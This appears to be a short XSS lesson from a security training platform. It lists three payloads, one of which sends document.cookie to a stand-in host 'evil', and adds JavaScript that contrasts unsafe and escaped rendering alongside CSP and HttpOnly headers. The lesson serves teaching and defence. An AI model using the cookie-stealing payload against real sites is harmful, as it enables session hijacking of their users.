
XSS (Cross-Site Scripting)

Executing JavaScript in the browser: reflected, stored, DOM-based.

25 min | intermediate | 3 commands | 3/5
Objectives
  • The 3 types of XSS
  • Cookie-stealing payload
  • CSP protection
Practice only in an authorized environment

The commands in this lesson are for the training simulator and for labs that you own. Scanning or testing other people's systems leads to legal liability.

Commands

The Run button sends the command to the simulator on the right; Copy is for your real Kali terminal.

$<script>alert(document.domain)</script>
$<img src=x onerror='fetch(`//evil/?c=`+document.cookie)'>
$<svg/onload=alert(1)>
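
Added example (not part of the original lesson): how the three payloads above come out when a page concatenates input into HTML versus encoding it first, plus response headers that back up the CSP and cookie objectives. The function names, the `<p class="comment">` template and the header values are assumptions for a hypothetical app.

```javascript
// PAYLOADS are copied from the lesson; everything else is illustrative.
const PAYLOADS = [
  "<script>alert(document.domain)</script>",
  "<img src=x onerror='fetch(`//evil/?c=`+document.cookie)'>",
  "<svg/onload=alert(1)>",
];

// Encode the five characters that are significant in HTML text and quoted attributes.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable rendering: user input is concatenated into markup unchanged.
function renderUnsafe(comment) {
  return "<p class=\"comment\">" + comment + "</p>";
}

// Hardened rendering: input is encoded for the HTML text context before insertion.
function renderSafe(comment) {
  return "<p class=\"comment\">" + escapeHtml(comment) + "</p>";
}

// List the opening tags in the output; the template itself contributes only <p>.
function elementNames(html) {
  return [...html.matchAll(/<\s*([a-zA-Z][a-zA-Z0-9]*)/g)].map((m) => m[1].toLowerCase());
}

// Defence in depth (hypothetical values): a CSP without 'unsafe-inline' blocks
// inline <script> and on* handlers, connect-src 'self' blocks fetch() to other
// origins, and HttpOnly keeps the session cookie out of document.cookie.
function responseHeaders(sessionId) {
  return {
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; connect-src 'self'; object-src 'none'; base-uri 'none'",
    "Set-Cookie": `session=${sessionId}; HttpOnly; Secure; SameSite=Lax; Path=/`,
  };
}

for (const p of PAYLOADS) {
  console.log("unsafe:", elementNames(renderUnsafe(p)), "safe:", elementNames(renderSafe(p)));
}
```

Output encoding covers reflected and stored XSS; for DOM-based XSS the equivalent fix is assigning untrusted strings through `textContent` rather than `innerHTML`.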